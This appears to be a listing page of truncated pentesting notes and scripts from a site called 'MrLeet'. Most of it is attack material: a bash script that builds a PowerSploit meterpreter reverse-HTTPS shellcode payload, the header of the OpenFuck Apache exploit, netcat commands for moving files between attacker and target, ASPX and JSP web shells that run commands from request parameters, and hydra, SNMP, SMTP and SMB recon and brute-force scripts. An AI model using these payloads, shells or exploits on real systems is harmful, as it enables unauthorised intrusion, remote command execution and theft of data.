Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

#!/bin/bash

# meterpreter ip & port
lhost=10.10.14.xx
lport=443

echo " * Writing Payload"
cat /usr/share/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload
echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload

echo " * Prepping Comman...




/*
* E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
*/

#include <arpa/inet.h>
#include &...




Push from Client to Listener
On target machine: nc -lp [local port] > [outfile]
On attacker machine: nc -w3 [listener IP] [listener port] < [infile]
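This sends [infile] to the listener, which writes it to [outfile]. The -w3 option makes the client time out after 3 seconds of inactivity. The transfer is unauthenticated and unencrypted, so compare a hash of [infile] and [outfile] afterwards to confirm the copy is complete and unmodified.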

Pull from Listener to Client
On target machine: nc -lp [local port] < [infile]
On attacker machine: ...




<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%=
Process.Start(
new ProcessStartInfo("cmd" ,"/c " + Request["c"] )
{
UseShellExecute = false,
RedirectStandardOutput = true
}
).StandardOutput.ReadToEnd()
%>
...




<pre>
<%@ page import="java.util.*,java.io.*,java.lang.*"%>
<%
String cmd = request.getParameter("cmd");
Process a =( new java.lang.ProcessBuilder(cmd.toString().split("\\s"))).start();
InputStream in = a.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine()...




#!/usr/bin/env python
import subprocess
import sys

if len(sys.argv) != 3:
print "Usage: sshrecon.py <ip address> <port>"
sys.exit(0)

ip_address = sys.argv[1].strip()
port = sys.argv[2].strip()

print "INFO: Performing hydra ssh scan against " + ip_address
HYDRA = "hydra -L wordlists/userli...




#!/usr/bin/env python
import subprocess
import sys

if len(sys.argv) != 2:
print "Usage: snmprecon.py <ip address>"
sys.exit(0)

snmpdetect = 0
ip_address = sys.argv[1]

ONESIXONESCAN = "onesixtyone %s" % (ip_address)
results = subprocess.check_output(ONESIXONESCAN, shell=True).strip()

if results != ...




#!/usr/bin/python
import socket
import sys
import subprocess

if len(sys.argv) != 2:
print "Usage: smtprecon.py <ip address>"
sys.exit(0)

#SMTPSCAN = "nmap -vv -sV -Pn -p 25,465,587 --script=smtp-vuln* %s" % (sys.argv[1])
#results = subprocess.check_output(SMTPSCAN, shell=True)

#f = open("results...




#!/usr/bin/perl -w
# smtp-user-enum - Brute Force Usernames via EXPN/VRFY/RCPT TO
# Copyright (C) 2008 pentestmonkey@pentestmonkey.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program i...




#!/usr/bin/python
import sys
import subprocess

if len(sys.argv) != 2:
print "Usage: smbrecon.py <ip address>"
sys.exit(0)

ip = sys.argv[1]
NBTSCAN = "python samrdump.py %s" % (ip)
nbtresults = subprocess.check_output(NBTSCAN, shell=True)
if ("Connection refused" not in nbtresults) and ("...

